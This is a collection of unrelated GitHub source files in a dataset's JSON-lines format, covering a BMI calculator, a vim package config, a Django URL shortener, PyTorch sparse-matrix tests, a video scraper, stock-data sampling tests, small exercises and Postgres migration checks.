@lru_cache(maxsize=128)\r\n def get_bmi_category(self, bmivalue):\r\n for category in self.metadata['CATEGORY_RANGE']:\r\n if category['LOW'] <= bmivalue <= category['HIGH']:\r\n return {'CATEGORY': category['CATEGORY'], 'HEALTHRISK': category['HEALTHRISK']}\r\n return {'CATEGORY': self.metadata['CATEGORY_MAX']['CATEGORY'],\r\n 'HEALTHRISK': self.metadata['CATEGORY_MAX']['HEALTHRISK']}\r\n\r\n def calculate_bmi_bulk(self, data):\r\n response = []\r\n for record in data:\r\n this_response = []\r\n if 'Weightkg' in record and 'HeightCm' in record:\r\n bmi_response = self.calculate_bmi(record['Weightkg'], record['HeightCm'])\r\n if bmi_response['status']:\r\n this_response = record\r\n this_response['bmi'] = bmi_response['output']\r\n this_response |= self.get_bmi_category(this_response['bmi'])\r\n else:\r\n print(bmi_response['error'])\r\n else:\r\n print('Either Weightkg or HeightCm or both are missing in', record)\r\n if this_response:\r\n response.append(this_response)\r\n return response\r\n\r\n def get_summary(self, data):\r\n # use pandas for more detailed and complex summary\r\n response = {}\r\n for record in data:\r\n if record['CATEGORY'] not in response:\r\n response[record['CATEGORY']] = 0\r\n response[record['CATEGORY']] += 1\r\n return 
response\r\n","repo_name":"arulmuruganas/code-20211110-arulmuruganas","sub_path":"BMIPackage/BMICalculator.py","file_name":"BMICalculator.py","file_ext":"py","file_size_in_byte":3191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15101441324","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n# kate: space-indent on; indent-width 4; mixedindent off; indent-mode python;\n\nvim = [\n {'name':'common', \n 'mainpackage':True,\n 'shortdesc':'Installs common package for the enhanced vi editor',\n 'packages':['vim', 'vim-doc', 'vim-scripts', 'vim-runtime'],\n 'files': [\n ('vim/vimrc', 'vimrc', 0o0644),\n ],\n 'divert': [\n ('/etc/vim/vimrc', 'vimrc'),\n ]\n },\n {'name':'tiny',\n 'shortdesc':'Installs enhanced vi editor - compact version',\n 'depends':['common'],\n 'side-by-side':['basic', 'tiny', 'gnome', 'cream', 'gtk', 'nox', 'athena'],\n 'packages':['vim-tiny'],\n },\n {'name':'basic',\n 'shortdesc':'Installs enhanced vi editor - basic version',\n 'depends':['common'],\n 'side-by-side':['basic', 'tiny', 'gnome', 'cream', 'gtk', 'nox', 'athena'],\n 'packages':[],\n },\n {'name':'gtk',\n 'shortdesc':'Installs enhanced vi editor - compiled with the GTK2 GUI',\n 'depends':['common'],\n 'side-by-side':['basic', 'tiny', 'gnome', 'cream', 'gtk', 'nox', 'athena'],\n 'packages':['vim-gtk'],\n },\n {'name':'gnome',\n 'shortdesc':'Installs enhanced vi editor - compiled with a GNOME2 GUI',\n 'depends':['common'],\n 'side-by-side':['basic', 'tiny', 'gnome', 'cream', 'gtk', 'nox', 'athena'],\n 'packages':['vim-gnome'],\n },\n {'name':'athena',\n 'shortdesc':'Installs enhanced vi editor - compiled with an Athena GUI',\n 'depends':['common'],\n 'side-by-side':['basic', 'tiny', 'gnome', 'cream', 'gtk', 'nox', 'athena'],\n 'packages':['vim-athena'],\n },\n {'name':'cream',\n 'shortdesc':'Installs enhanced vi editor with VIM macros for beginners',\n 'depends':[('gnome','gtk')],\n 'side-by-side':['basic', 'tiny', 'gnome', 'cream', 'gtk', 'nox', 'athena'],\n 'packages':['cream'],\n },\n {'name':'nox',\n 'shortdesc':'Installs enhanced vi editor without X',\n 'depends':['common'],\n 'side-by-side':['basic', 'tiny', 'gnome', 'cream', 'gtk', 'nox', 'athena'],\n 'packages':['vim-nox'],\n },\n {'name':'none', 'shortdesc':'Uninstalls the enhanced vi editor', 'packages':[] },\n]\n","repo_name":"aroth-arsoft/arsoft-meta-packages","sub_path":"grp_vim.py","file_name":"grp_vim.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32995095278","text":"from django.http import HttpResponse,JsonResponse\nfrom django.shortcuts import render, redirect\n\nfrom urlapp.forms import URLForm\nfrom urlapp.util import checkHash\nfrom .models import URLS\nfrom rest_framework.decorators import api_view\n\n\n# Create your views here.\n\ndef health(request):\n return JsonResponse({'status':'ok'})\n\n@api_view(['POST'])\ndef api(request):\n if request.method == 'POST':\n long_url = request.data['long_url']\n short_url = checkHash(long_url=long_url)\n surl = 'https://web-production-c1d8.up.railway.app/api/'+short_url\n return JsonResponse({\"long_url\":long_url,\"short_url\":surl})\n else:\n return JsonResponse({\"error\":\"Invalid Request\"})\n\n\n \n\n\ndef reroute(request,pk):\n url_data = URLS.objects.get(id=pk)\n return redirect(url_data.long_url)\n 
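\n# Illustrative sketch only (not part of the original project): checkHash is\n# imported from urlapp.util above and its implementation is not shown in this\n# file. A hash-based shortener helper could look roughly like the function\n# below; the name check_hash_sketch, the md5 digest, the 8-character code\n# length and the URLS.short_url field are all assumptions made for illustration.\nimport hashlib\n\n\ndef check_hash_sketch(long_url):\n # Derive a deterministic short code from the long URL.\n code = hashlib.md5(long_url.encode('utf-8')).hexdigest()[:8]\n # Reuse the existing mapping if this URL was shortened before.\n row, _created = URLS.objects.get_or_create(short_url=code, defaults={'long_url': long_url})\n return row.short_url\n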
\n","repo_name":"nilesh05apr/urlshortner","sub_path":"urlshortner/urlapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30840120135","text":"import numpy as np\nimport torch\nimport torch_sparse as ts\nfrom test_util import get_rand_vals\n\nimport unittest\nimport random\n\nsweep_size = 10\n\n\ndef sweep(**kwargs):\n def wrapped_f(f):\n swept_args = []\n for _ in range(sweep_size):\n args = {}\n for arg in kwargs:\n a = kwargs[arg]\n if type(a) is list:\n args[arg] = random.choice(a)\n else:\n args[arg] = a\n swept_args.append(args)\n\n def f_(*args, **kwargs):\n for kw in swept_args:\n print(\"running\", f.__name__, \"with\", kw)\n f(*args, **kw)\n\n return f_\n\n return wrapped_f\n\n\ncuda = torch.device(\"cuda\")\n\n\nclass TestBlockSparseTensor(unittest.TestCase):\n def test_ident(self):\n X = torch.randn(128, 128, device=cuda)\n W = torch.eye(128, device=cuda)\n bs_W = ts.createBlockSparseTensor(W, torch.ones(8, 8))\n Y = ts.mm(X, bs_W)\n torch.testing.assert_allclose(X, Y)\n\n @sweep(mb=[32, 64, 128], i=[32, 64, 128], o=[32, 64, 128], block_size=[4, 8, 16])\n def test_fwd(self, mb, i, o, block_size):\n X, masked_W, bs_W = get_rand_vals(mb, i, o, block_size)\n Y = ts.mm(X, bs_W)\n Y_ref = X @ masked_W\n torch.testing.assert_allclose(Y, Y_ref)\n\n @sweep(mb=[32, 64, 128], i=[32, 64, 128], o=[32, 64, 128], block_size=[4, 8, 16])\n def test_bwd_dx(self, mb, i, o, block_size):\n X1, masked_W, bs_W = get_rand_vals(mb, i, o, block_size)\n X2 = X1.clone()\n X1.requires_grad = True\n X2.requires_grad = True\n\n Y = ts.mm(X1, bs_W)\n Y.sum().backward()\n Y_ref = X2 @ masked_W\n Y_ref.sum().backward()\n torch.testing.assert_allclose(Y, Y_ref)\n torch.testing.assert_allclose(X1.grad, X2.grad)\n\n @sweep(mb=[32, 64, 128], i=[32, 64, 128], o=[32, 64, 128], block_size=[4, 8, 16])\n def test_bwd_dw(self, mb, i, o, block_size):\n X, masked_W, bs_W, mask = get_rand_vals(mb, i, o, block_size, True)\n\n masked_W.requires_grad = True\n bs_W.data.requires_grad = True\n\n ts.mm(X, bs_W).sum().backward()\n (X @ masked_W).sum().backward()\n torch.testing.assert_allclose(\n (masked_W.grad * mask).flatten().sum(), bs_W.data.grad.flatten().sum()\n )\n\n @sweep(mb=[32, 64, 128], i=[32, 64, 128], o=[32, 64, 128], block_size=[4, 8, 16])\n def test_bwd_g_dx(self, mb, i, o, block_size):\n X1, _, bs_W, mask = get_rand_vals(mb, i, o, block_size, True)\n X2 = X1.clone()\n X1.requires_grad = True\n X2.requires_grad = True\n\n Y = torch.randn(mb, o, device=cuda)\n\n bs_W = ts.mm_out(X1.t(), Y, bs_W)\n W = (X2.t() @ Y) * mask\n torch.testing.assert_allclose(bs_W.data.sum(), W.sum())\n\n bs_W.data.sum().backward()\n W.sum().backward()\n torch.testing.assert_allclose(X1.grad, X2.grad)\n\n @sweep(mb=[32, 64, 128], i=[32, 64, 128], o=[32, 64, 128], block_size=[4, 8, 16])\n def test_bwd_g_dy(self, mb, i, o, block_size):\n X, _, bs_W, mask = get_rand_vals(mb, i, o, block_size, True)\n\n Y1 = torch.randn(mb, o, device=cuda)\n Y2 = Y1.clone()\n Y1.requires_grad = True\n Y2.requires_grad = True\n\n bs_W = ts.mm_out(X.t(), Y1, bs_W)\n W = (X.t() @ Y2) * mask\n torch.testing.assert_allclose(bs_W.data.sum(), W.sum())\n\n bs_W.data.sum().backward()\n W.sum().backward()\n torch.testing.assert_allclose(Y1.grad, Y2.grad)\n\n\nif __name__ == \"__main__\":\n 
unittest.main()\n","repo_name":"bwasti/sparse","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"708994353","text":"import requests\nimport pandas as pd \nimport os \nimport argparse\nimport tqdm\n\nparser = argparse.ArgumentParser(\"Scrape training and validation videos for the next dataset\")\nparser.add_argument(\"--split\", choices=[\"training\", \"validation\"])\n\nargs = parser.parse_args()\n\nBASE_LINK = \"https://multimedia-commons.s3-us-west-2.amazonaws.com/data/videos/mp4/{first_3}/{second_3}/{filename}\"\n\nmissing_videos = []\ncompleted_videos = [os.path.splitext(f)[0] for dp, dn, filenames in os.walk(\"training_videos\") for f in filenames if os.path.splitext(f)[1] == '.mp4']\ndf = pd.read_csv(f\"{args.split}_link_mapping.csv\")\nfor id, row in tqdm.tqdm(df.iterrows()):\n if str(row[\"video_id\"]) in completed_videos:\n continue\n hash = row[\"video_hash\"]\n video_path = row[\"video_path\"]\n save_file = f\"{row['video_id']}.mp4\"\n first_3 = hash[:3]\n second_3 = hash[3:6]\n filename = f\"{hash}.mp4\"\n url = BASE_LINK.format(first_3=first_3, second_3=second_3, filename=filename)\n # print(url)\n retries = 0 \n try:\n response = requests.get(url)\n except:\n retries += 1 \n while (retries < 5):\n try:\n response = requests.get(url)\n except:\n retries += 1 \n else:\n # stop retrying as soon as a request succeeds\n break\n if retries == 5:\n missing_videos.append([row[\"video_id\"], row[\"video_hash\"], row[\"video_path\"]])\n print(f\"Couldn't find video for {url}\")\n continue\n if str(response.status_code).startswith(\"2\"):\n os.makedirs(os.path.join(f\"{args.split}_videos\", os.path.dirname(video_path)), exist_ok=True)\n with open(os.path.join(f\"{args.split}_videos\", os.path.dirname(video_path), save_file), \"wb\") as f:\n f.write(response.content)\n else:\n missing_videos.append([row[\"video_id\"], row[\"video_hash\"], row[\"video_path\"]])\n \n # break\n\nif len(missing_videos):\n df = pd.DataFrame(missing_videos, columns=[\"video_id\", \"video_hash\", \"video_path\"])\n df.to_csv(f\"{args.split}_missing_videos.csv\", index=False)","repo_name":"11777-MMML/11777-videoQA","sub_path":"videos_scraping/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"70149086953","text":"import pandas as pd\nimport pytest\n\nfrom ..sampling import extend_sep_for_sampling, rebase_at_each_filing_sampling\nfrom ..dataset import Dataset\nfrom ..processing.engine import pandas_mp_engine\n\n\"\"\"\nTest datasets:\n/datasets/testing/...\nComplete data for AAPL, NTK (Consumer Electronics) and FCX (Copper)\nsep.csv\nsf1_art.csv\nsf1_arq.csv\n\"\"\"\n\nsep = None\nsf1_art = None\nsf1_arq = None\nmetadata = None\n\nsep_extended = None\nsep_sampled = None\n\n\n@pytest.fixture(scope='module', autouse=True)\ndef setup():\n # Will be executed before the first test in the module\n global sep, sf1_art, sf1_arq, metadata\n global sep_extended, sep_sampled\n sep = pd.read_csv(\"../datasets/testing/sep.csv\", parse_dates=[\"date\"], index_col=\"date\", low_memory=False)\n sf1_art = pd.read_csv(\"../datasets/testing/sf1_art.csv\", parse_dates=[\"calendardate\", \"datekey\"], index_col=\"calendardate\", low_memory=False)\n sf1_arq = pd.read_csv(\"../datasets/testing/sf1_arq.csv\", parse_dates=[\"calendardate\", \"datekey\"], index_col=\"calendardate\", low_memory=False)\n metadata = 
pd.read_csv(\"../datasets/sharadar/SHARADAR_TICKERS_METADATA.csv\", low_memory=False)\n \n yield\n \n # Will be executed after the last test in the module\n if isinstance(sep_extended, pd.DataFrame):\n sep_extended.sort_values(by=[\"ticker\", \"date\"], inplace=True)\n sep_extended.to_csv(\"../datasets/testing/sep_extended.csv\")\n if isinstance(sep_sampled, pd.DataFrame):\n sep_sampled.sort_values(by=[\"ticker\", \"date\"], inplace=True)\n sep_sampled.to_csv(\"../datasets/testing/sep_sampled.csv\")\n\n\ndef test_extend_sep_for_sampling():\n global sep, sf1_art, sf1_arq, metadata\n global sep_extended\n\n sep_extended = pandas_mp_engine(callback=extend_sep_for_sampling, atoms=sep, \\\n data={\"sf1_art\": sf1_art, \"metadata\": metadata}, \\\n molecule_key='sep', split_strategy='ticker', \\\n num_processes=1, molecules_per_process=1)\n\n \"\"\"\n Test that a SEP file containing multiple tickers will get the correct sf1 \n datekey from sf1_art file with multiple tickers.\n \"\"\"\n # Tests for AAPL\n # date_1998_12_23 = pd.to_datetime(\"1998-12-23\") \n # date_1999_01_04 = pd.to_datetime(\"1999-01-04\") # datekey should be: 1998-12-23\n # date_1999_02_05 = pd.to_datetime(\"1999-02-05\") # datekey should be: 1999-12-23\n # date_1999_02_08 = pd.to_datetime(\"1999-02-08\") # datekey should be: 1999-02-08\n # date_1999_02_11 = pd.to_datetime(\"1999-02-11\") # datekey should be: 1999-02-08\n\n sep_extended_aapl = sep_extended.loc[sep_extended[\"ticker\"] == \"AAPL\"]\n\n assert sep_extended_aapl.loc[\"1999-01-04\"][\"datekey\"] == pd.to_datetime(\"1998-12-23\") \n assert sep_extended_aapl.loc[\"1999-02-05\"][\"datekey\"] == pd.to_datetime(\"1998-12-23\")\n assert sep_extended_aapl.loc[\"1999-02-08\"][\"datekey\"] == pd.to_datetime(\"1999-02-08\")\n assert sep_extended_aapl.loc[\"1999-02-11\"][\"datekey\"] == pd.to_datetime(\"1999-02-08\")\n\n # Test metadata was set correctly\n metadata_aapl = metadata.loc[metadata[\"ticker\"] == \"AAPL\"].iloc[-1]\n\n assert sep_extended_aapl.loc[\"1999-01-04\"][\"industry\"] == metadata_aapl[\"industry\"]\n assert sep_extended_aapl.loc[\"1999-01-04\"][\"sector\"] == metadata_aapl[\"sector\"]\n assert sep_extended_aapl.loc[\"1999-01-04\"][\"siccode\"] == metadata_aapl[\"siccode\"]\n assert sep_extended_aapl.loc[\"1999-01-04\"][\"sharesbas\"] == \\\n sf1_art.loc[sf1_art.datekey == sep_extended_aapl.loc[\"1999-01-04\"][\"datekey\"]].iloc[-1][\"sharesbas\"]\n\n # Tests for NTK\n sep_extended_ntk = sep_extended.loc[sep_extended[\"ticker\"] == \"NTK\"]\n\n assert sep_extended_ntk.loc[\"2011-03-31\"][\"datekey\"] == pd.to_datetime(\"2011-03-31\")\n assert sep_extended_ntk.loc[\"2011-05-04\"][\"datekey\"] == pd.to_datetime(\"2011-03-31\")\n\n\n@pytest.mark.skip()\ndef test_rebase_at_each_filing_sampling():\n global sep_extended\n global sep_sampled\n\n\n sep_sampled = pandas_mp_engine(callback=rebase_at_each_filing_sampling, atoms=sep_extended, data=None, \\\n molecule_key='observations', split_strategy='ticker', num_processes=1, molecules_per_process=1, \\\n days_of_distance=20)\n\n sep_sampled = sep_sampled.sort_values(by=[\"ticker\", \"date\"])\n\n sep_sampled.to_csv(\"../datasets/testing/sep_sampled_latest_implementation.csv\")\n\n sep_sampled_aapl = sep_sampled.loc[sep_sampled.ticker == \"AAPL\"]\n\n assert sep_sampled_aapl.index[0] == pd.to_datetime(\"1997-12-31\")\n assert sep_sampled_aapl.index[1] == pd.to_datetime(\"1998-02-09\")\n assert sep_sampled_aapl.index[2] == pd.to_datetime(\"1998-03-09\")\n assert sep_sampled_aapl.index[3] == 
pd.to_datetime(\"1998-04-09\")\n assert sep_sampled_aapl.index[4] == pd.to_datetime(\"1998-05-11\")\n assert sep_sampled_aapl.index[5] == pd.to_datetime(\"1998-06-11\")\n assert sep_sampled_aapl.index[6] == pd.to_datetime(\"1998-07-10\")\n assert sep_sampled_aapl.index[7] == pd.to_datetime(\"1998-08-10\")\n assert sep_sampled_aapl.index[8] == pd.to_datetime(\"1998-09-10\")\n\n \n \"\"\"\n AAPL\n Date\n 1997-12-31\n 1998-02-09\n 1998-03-09\n 1998-04-09\n 1998-05-11\n 1998-06-11\n 1998-07-10\n 1998-08-10\n 1998-09-10\n 1998-10-09\n 1998-11-10\n 1998-12-23\n 1999-02-08\n 1999-03-08\n 1999-04-08\n 1999-05-11\n 1999-06-11\n Datekey\n 1997-12-05\n 1998-02-09\n 1998-02-09\n 1998-02-09\n 1998-05-11\n 1998-05-11\n 1998-05-11\n 1998-08-10\n 1998-08-10\n 1998-08-10\n 1998-08-10\n 1998-12-23\n 1999-02-08\n 1999-02-08\n 1999-02-08\n 1999-05-11\n 1999-05-11\n 1999-05-11\n 1999-08-06\n 1999-08-06\n 1999-08-06\n \"\"\"\n\n\n\n\n@pytest.mark.skip()\ndef test_rebase_at_each_filing_sampling_OLD():\n global sep_extended\n global sep_sampled\n\n\n sep_sampled = pandas_mp_engine(callback=rebase_at_each_filing_sampling, atoms=sep_extended, data=None, \\\n molecule_key='observations', split_strategy='ticker', num_processes=1, molecules_per_process=1, \\\n days_of_distance=20)\n \n # Tests for AAPL\n first_9_apple_samples = [\n pd.to_datetime(\"1999-02-08\"), \n pd.to_datetime(\"1999-03-08\"), \n pd.to_datetime(\"1999-04-08\"), \n pd.to_datetime(\"1999-05-11\"), \n pd.to_datetime(\"1999-06-11\"), \n pd.to_datetime(\"1999-07-12\"), \n pd.to_datetime(\"1999-08-06\")\n ]\n\n first_6_ntk_samples = [\n pd.to_datetime(\"2011-03-31\"),\n # pd.to_datetime(\"2011-04-29\"), This sample is less than 20 day before a new filing, and should therefore not be among the samples\n pd.to_datetime(\"2011-05-12\"),\n pd.to_datetime(\"2011-06-13\"),\n pd.to_datetime(\"2011-07-12\"),\n pd.to_datetime(\"2011-08-09\"),\n pd.to_datetime(\"2011-09-09\"),\n\n ]\n\n apple_samples = sep_sampled.loc[sep_sampled[\"ticker\"] == \"AAPL\"].loc[\"1999-02-08\":\"1999-08-06\"]\n ntk_samples = sep_sampled.loc[sep_sampled[\"ticker\"] == \"NTK\"].loc[\"2011-03-31\":\"2011-09-09\"]\n\n # print(ntk_samples[[\"datekey\"]])\n\n index = 0\n for date, sample in apple_samples.iterrows():\n assert first_9_apple_samples[index] == date\n index += 1\n\n index = 0\n for date, sample in ntk_samples.iterrows(): \n assert first_6_ntk_samples[index] == date\n index += 1\n\n\n\n@pytest.mark.skip(reason=\"Not interested in this atm, this test is not completed\")\ndef test_first_filing_based_sampling():\n global sep_extended\n global sep_sampled\n\n sep_extended = pandas_mp_engine(callback=first_filing_based_sampling, atoms=sep_extended, \\\n data=None, molecule_key='sep', split_strategy='ticker', num_processes=1, molecules_per_process=1)\n\n\n print(sep_sampled[\"date\"])\n print(sep_sampled[\"datekey\"])\n assert False\n","repo_name":"DidrikF/automated-trading-system","sub_path":"dataset_development/tests/test_sampling.py","file_name":"test_sampling.py","file_ext":"py","file_size_in_byte":7667,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"72"} +{"seq_id":"71916833192","text":"import sys\n# memorization, closely related to dynamic programming\n# DP: top down, breakthe problem up as you reuse previous result\n\n# key is what you have, value is what you calculate\n\n# fibonacci sequence\n# a function that returns the n-th item in the fibonacci sequence\n# golden proportion\n\n# 0 1 1 2 3 5 8 13 21 34 55 89\n\n# let's do it 
recursively\ncache = {}\n\n\ndef fib(n):\n\n if n == 0 or n == 1:\n return n\n else:\n if n in cache:\n return cache[n]\n else:\n cache[n] = fib(n - 1) + fib(n - 2)\n\n return cache[n]\n\n\nprint(fib(3)) # 2\nprint(fib(11)) # 89\nprint(fib(25))\nprint(fib(500))\nprint(sys.getrecursionlimit())\n","repo_name":"Edudeiko/Hash-tables-module-project-CS","sub_path":"notebooks/memorization.py","file_name":"memorization.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74907980393","text":"class Funcionario: \n def __init__(self, nome, cpf, salario): \n self._nome = nome \n self._cpf = cpf \n self._salario = salario\n\nclass Gerente(Funcionario): \n\n def __init__(self, senha, qtd_funcionarios, nome, cpf, salario): \n self._senha = senha \n self._qtd_funcionarios = qtd_funcionarios \n Funcionario.__init__(self, nome, cpf, salario)\n\n def autentica(self, senha): \n if self._senha == senha: \n print(\"acesso permitido\") \n return True \n else: \n print(\"acesso negado\")\n return False\n\n def getNome(self):\n return self._nome\n\n\nnome = \"Hermano\"\ncpf = '000'\nsalario = 10\nsenha = '12345'\nqtd_funcionarios = 5\n","repo_name":"daysonn/repositorio_estruturas_dados","sub_path":"Classes/Heranca/funcionario.py","file_name":"funcionario.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20892459786","text":"PLAYERS_PER_GAME = 2\nWORDS_PER_SENTENCE = 10\nROUNDS_PER_GAME = 10\nNUMBER_COMPUTER_SENTENCES = 2\nMARKOV_STATE_SIZE = 2\nOPTIONS_PRESENTED = 3\n\nFIRST_WORD_CHOICE_TIME_SECONDS = 5\nWORD_CHOICE_TIME_SECONDS = 3\nGUESS_TIME_SECONDS = 10\nREVEAL_TIME_SECONDS = 8\nINACTIVITY_TIMEOUT_SECONDS = 5\n\nCOOKIE_NAME = 'markov'\n\nGAME_STATUS_PREGAME = 'pregame'\nGAME_STATUS_WRITING = 'writing'\nGAME_STATUS_GUESS_TIME = 'guess_time'\nGAME_STATUS_REVEAL = 'reveal'\nGAME_STATUS_POSTGAME = 'postgame'\n\nMESSAGE_JOINED_QUEUE = 'join_queue'\nMESSAGE_GAME_READY = 'game_ready'\n\nFALLBACK_WORDS = [\n 'if', 'and', 'or', 'but', 'into', 'so', 'with', 'for'\n]\n\nwith open('prompts.txt', 'r') as f:\n PROMPTS = f.read().split('\\n')\n","repo_name":"colinhostetter/markov-game","sub_path":"app/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11135135863","text":"#pylint: disable=missing-module-docstring,missing-function-docstring,invalid-name\nfrom typing import List\n\nfrom lib import check_coordinates\nfrom lib import inputgetter_int_matrix\nfrom lib import Matrix\n\nmatrix: Matrix = inputgetter_int_matrix('inputs/11.txt')\ntests_matrix: Matrix = inputgetter_int_matrix('tests/11.txt')\n\ndef increase_by_one(m) -> Matrix:\n for x, row in enumerate(m):\n for y, _ in enumerate(row):\n m[x][y] += 1\n return m\n\ndef flash_increase(x, y, m) -> Matrix:\n for x_inc in (-1, 0, 1):\n for y_inc in (-1, 0, 1):\n if check_coordinates(x+x_inc, y+y_inc, m):\n m[x+x_inc][y+y_inc] += 1\n return m\n\ndef caused_more_flashes(m, flashes_in_step) -> bool:\n # This is equivalent to\n # while any(m[x][y] > 9 for x in range(len(m)) for y in range(len(m[0])) if (x,y) not in flashes_in_step):\n # which is arguably a too long line\n for x, row in enumerate(m):\n for y, col in enumerate(row):\n if (x,y) not in flashes_in_step:\n if col > 9:\n return True\n return False\n\ndef solve(m) -> None:\n 
flashes = 0\n for i in range(1, 1000):\n m = increase_by_one(m)\n flashes_in_step = []\n while caused_more_flashes(m, flashes_in_step):\n for x, row in enumerate(m):\n for y, col in enumerate(row):\n if col > 9 and (x,y) not in flashes_in_step:\n m = flash_increase(x, y, m)\n flashes_in_step.append((x,y))\n flashes += len(flashes_in_step)\n if len(flashes_in_step) == len(m)*len(m[0]):\n print(f\"The solution to part 2 is: {i}\")\n break\n if i == 100:\n print(f\"The solution to part 1 is: {flashes}\")\n for x, y in flashes_in_step:\n m[x][y] = 0\n\nsolve(tests_matrix)\nsolve(matrix)\n","repo_name":"micr0cuts/challenges","sub_path":"advent-of-code-2021/day11.py","file_name":"day11.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2810285258","text":"import discord\r\nfrom discord.ext import commands,tasks\r\nimport chessdotcom as chess\r\nimport random\r\nimport requests\r\nimport json\r\nimport asyncio\r\nimport itertools\r\n\r\n\r\nclass Chess(commands.Cog):\r\n def __init__(self,bot):\r\n self.bot=bot\r\n\r\n \r\n\r\n @commands.command(aliases=[\"chessprofile\"])\r\n async def get_player(self,ctx,*,username):\r\n try:\r\n data = chess.get_player_profile(username).json\r\n data1=chess.is_player_online(username).json\r\n data2=chess.get_player_clubs(username).json\r\n profile=discord.Embed(title=data['username'],description=data['name'] if 'name' in data else \"No name given\",color=discord.Colour.red())\r\n profile.set_thumbnail(url=data['avatar'] if 'avatar' in data else \"https://betacssjs.chesscomfiles.com/bundles/web/images/noavatar_l.1c5172d5.gif\")\r\n profile.add_field(name=\"Country:\",value=data['country'],inline=False)\r\n profile.add_field(name=\"Followers:\",value=data['followers'],inline=False)\r\n profile.add_field(name=\"Status:\",value=data['status'],inline=False)\r\n profile.add_field(name=\"Online:\",value=\"Yes\" if data1['online'] else \"No\",inline=False)\r\n profile.add_field(name=\"Url:\",value=data['url'],inline=False)\r\n for i in data2['clubs']:\r\n profile.add_field(name=\"Club:\",value=i['name'],inline=False)\r\n await ctx.send(embed=profile)\r\n except Exception as e:\r\n print(e)\r\n await ctx.send(\"Username doesnot exist\")\r\n\r\n @commands.command(aliases=[\"leaderboards\"])\r\n async def print_leaderboards(self,ctx):\r\n await ctx.send(\"Leaderboards\")\r\n data = chess.get_leaderboards().json\r\n categories = data.keys()\r\n for category in categories:\r\n await ctx.send('Category:'+str(category))\r\n for idx, entry in enumerate(data[category]):\r\n if idx<3:\r\n await ctx.send(f'Rank: {idx + 1} | Username: {entry[\"username\"]} | Rating: {entry[\"score\"]}')\r\n else:\r\n break\r\n @commands.command(aliases=[\"stats\"])\r\n async def get_player_rating(self,ctx,*,username):\r\n await ctx.send(\"Player Ratings\")\r\n data = chess.get_player_stats(username).json\r\n categories = ['chess_blitz', 'chess_rapid', 'chess_bullet']\r\n for category in categories:\r\n await ctx.send('Category:'+str(category))\r\n await ctx.send(f'Current: {data[category][\"last\"][\"rating\"]}')\r\n await ctx.send(f'Best: {data[category][\"best\"][\"rating\"]}')\r\n await ctx.send(f'Record: {data[category][\"record\"]}')\r\n\r\n @commands.command()\r\n async def chesspuzzle(self,ctx):\r\n await ctx.send(\"Random Puzzle\")\r\n data = chess.get_random_daily_puzzle().json\r\n await ctx.send(data['title'])\r\n await ctx.send(data['image'])\r\n await 
ctx.send(data['url'])\r\n\r\n\r\ndef setup(bot):\r\n bot.add_cog(Chess(bot))\r\n","repo_name":"Mastermind-sap/joker","sub_path":"cogs/chess.py","file_name":"chess.py","file_ext":"py","file_size_in_byte":3153,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"71891992552","text":"\ndef solution(number, k):\n stack = []\n\n # Greedy: while removals remain and the digit on top of the stack is\n # smaller than the current digit, dropping the top yields a larger number.\n for digit in number:\n while stack and k > 0 and stack[-1] < digit:\n stack.pop()\n k -= 1\n stack.append(digit)\n\n # If removals remain (non-increasing input), drop them from the tail.\n if k > 0:\n stack = stack[:-k]\n\n return ''.join(stack)","repo_name":"data-sign/algorithm","sub_path":"프로그래머스/lv2/42883. 큰 수 만들기/큰 수 만들기.py","file_name":"큰 수 만들기.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"162773719","text":"import difflib\n\nfrom mail.devpack.lib.components.postgres import Postgres\nfrom mail.devpack.tests.helpers.fixtures import coordinator_factory\n\n\ndef template_migration_check(db_comp_cls, partition_tables=None):\n with coordinator_factory(db_comp_cls) as coord:\n return check_migrations_simple(coord.components[db_comp_cls], partition_tables=partition_tables)\n\n\ndef check_migrations_simple(db, partition_tables=None):\n \"\"\"\n :type db: Postgres\n :type partition_tables: list[str]\n \"\"\"\n return check_migrations(\n db.pg,\n users=db.users,\n partition_tables=partition_tables,\n before_all_prefixes=db.before_all_prefixes,\n after_all_prefixes=db.after_all_prefixes,\n snapshot_sql_files=db.snapshot_sql_files,\n migration_prefixes=db.migration_prefixes,\n )\n\n\ndef check_migrations(db, users, partition_tables,\n before_all_prefixes, after_all_prefixes, snapshot_sql_files, migration_prefixes):\n db_snapshot = Postgres(\n dbname=db.dbname + '_from_snapshot',\n port=db.port + 1,\n users=users,\n ddl_prefixes=before_all_prefixes + snapshot_sql_files + after_all_prefixes,\n root=db.root,\n )\n db_migrations = Postgres(\n dbname=db.dbname + '_from_migrations',\n port=db.port + 2,\n users=users,\n ddl_prefixes=before_all_prefixes + migration_prefixes + after_all_prefixes,\n root=db.root,\n )\n\n with db_snapshot.standalone(), db_migrations.standalone():\n delta = compare_db_dumps(\n db_snapshot.pg,\n db_migrations.pg,\n partition_tables=partition_tables\n )\n assert not delta, 